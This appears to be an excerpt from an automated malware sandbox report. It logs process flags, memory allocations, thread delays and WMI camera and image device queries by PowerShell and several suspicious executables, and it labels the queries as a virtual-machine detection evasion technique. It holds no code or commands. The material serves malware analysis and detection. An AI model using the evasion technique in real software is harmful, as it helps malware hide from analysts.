Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Memory allocated: 158ACAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Memory allocated: 158C65B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Memory allocated: 1700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Memory allocated: 1B290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Memory allocated: D50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Memory allocated: 1AD40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Memory allocated: 3070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Memory allocated: 1B200000 memory reserve \| memory write watch
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Memory allocated: 14C0000 memory reserve \| memory write watch
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Memory allocated: 1B090000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595929	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595780	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 599860
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 599454
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 598797
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 598516
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 597922
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 597547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 597047
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 596547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 596157
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 595532
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 595329
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594954
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594709
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594110
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 593735
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 593464
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 592922
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 592657
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 592344
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 591969
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 591625
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 591172
